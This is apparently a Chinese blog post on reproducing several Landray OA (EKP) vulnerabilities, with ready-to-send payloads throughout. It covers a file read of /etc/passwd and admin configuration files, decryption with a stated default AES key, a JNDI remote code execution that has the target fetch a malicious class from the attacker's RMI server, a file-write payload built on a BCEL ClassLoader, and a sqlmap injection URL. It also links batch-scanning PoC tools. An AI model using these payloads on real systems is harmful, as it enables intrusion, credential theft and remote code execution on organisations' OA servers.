- 1*p++与(*p)++与*(p++)------自增运算符常见误区
- 2SpringBoot-插件化以及springboot扩展接口_spring boot spi第三方扩展
- 3图像增强:自适应直方图均衡化(AHE)
- 4微信公共号消息推送给你心爱的她/他-Python3版本_微信推送怎么创建python文件
- 5Spring Boot Helper插件免费版的下载_spring boot helper插件下载
- 6windows上搭建llama小型私有模型_llama-cpp-python
- 71.9 向量投影_向量投影法
- 8怎么样检查自己系统上的Python环境中是否有某个包(扩展库)?_python怎么检查是否有某个库
- 9三种安装docker-compose方式_docker compose安装
- 10Windows脚本 - Bat批处理命令使用教程_批处理 菜鸟教程
蓝凌OA漏洞复现
赞
踩
前言
又是学习漏洞的一天,老是能听到蓝凌OA爆发了什么,我就很蒙蔽,想问问旁边师傅,蓝凌是个什么,又怕师傅来句你连蓝凌都不知道,怪尴尬,索性还是靠自己把,今天复现蓝凌OA
任意文件读取漏洞
漏洞描述
深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息。
漏洞复现
访问/sys/ui/extend/varkind/custom.jsp,抓包并修改为POST,并加上payload(var={“body”:{“file”:“file:///etc/passwd”}}),在此进行发包
但是嘛,保不齐人家不是linux系统,所以不要试完这个payload读不出来,就代表它不存在漏洞
批量扫描POC
在github:https://github.com/Xd-tl/Landray-POC,需要请自取
SSRF+JNDI远程命令执行
漏洞描述
深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息,读取配置文件得到密钥后访问 admin.do 即可利用 JNDI远程命令执行获取权限
漏洞复现
利用任意文件读取/WEB-INF/KmssConfig/admin.properties配置文件
获得password,由于蓝凌OA默认是AES加密,且 默认密钥为 kmssAdminKey,所以只要拿着password进行解密就好(返回的password字符串去掉末尾的/r在进行解密)
拿到密码了发现是个弱密码这这这,竟然忘了爆破,势必得进一波后台啦,不然那就可太亏了,这都快2022年了,不会还有人不知道后台地址把,竟然是我不知道,大意了,赶紧百度一下,原来是久违的admin.do
利用burp对其抓包,并修改为POST,在加上payloadmethod=testDbConn&datasource=rmi://xxx.xxx.xxx.xxx:xxxx/cbdsdg,现在我们先构造恶意的exp,类似于dnslog
对其进行编译,并让其兼容1.7
在把生成的exp.class文件放到我们服务器上,在使用marshalsec工具(https://github.com/mbechler/marshalsec)构建一个JNDI服务
最后就是发送payload
最后看服务器的记录,由于本地没有success文件所以会报404,但是目标是请求了咱的服务器,
说明成功执行了咱们的命令
任意文件写入漏洞
漏洞描述
蓝凌OA 存在任意文件写入漏洞,攻击者可以上传恶意文件
漏洞复现
在上面的任意文件读取漏洞中,修改其payload为var={“body”:{“file”:“/sys/search/sys_search_main/sysSearchMain.do?method=editParam”}}&fdParemNames=11&fdParameters=[shellcode]即可
在shellcode位置补上,发包即可
<java>
<void class="com.sun.org.apache.bcel.internal.util.ClassLoader">
<void method="loadClass">
<string>$$BCEL$$......</string>
<void method="newInstance"></void>
</void>
</void>
</java>
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
有关详细操作,在我的Java安全专栏里面的BCEL Classloader(https://blog.csdn.net/xd_2021/article/details/121878806)文章里面最后复现了一个,该文章讲BCEL的,有兴趣的可以看看,关于BCEL编码工具我也是写了一个在github上(https://github.com/Xd-tl/BCELCode)
批量扫描POC
在github:https://github.com/Xd-tl/Landray-POC,需要请自取
EKP后台SQL注入
漏洞描述
深圳市蓝凌软件股份有限公司数字OA(EKP)存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。
漏洞复现
漏洞urlhttps://xxx.xxx.xxx.xxx/km/imeeting/km_imeeting_res/kmImeetingRes.do?contentType=json&method=listUse&orderby=1&ordertype=down&s_ajax=true
访问该url并对其抓包,拿到包后保存到文件里面,利用sqlmap -r即可
总结
最后也是全部复现完了,也让我明白爆破的重要性,先爆,爆不出,在走正常路子
大家可以关注菜鸡的公众号,有什么好想法也可以让我学习一下,有什么问题可以一块解决,由于二维码违规,下面是base64编码的文字
5b6u5L+h5YWs5LyX5Y+34oCc5a6J5YWo5re35a2Q4oCd77yM5Y+v5Lul55So5b6u5L+h5pCc5LiA5pCc77yM5q2j5Zyo5a6M5ZaE5LitLi4uLi4u
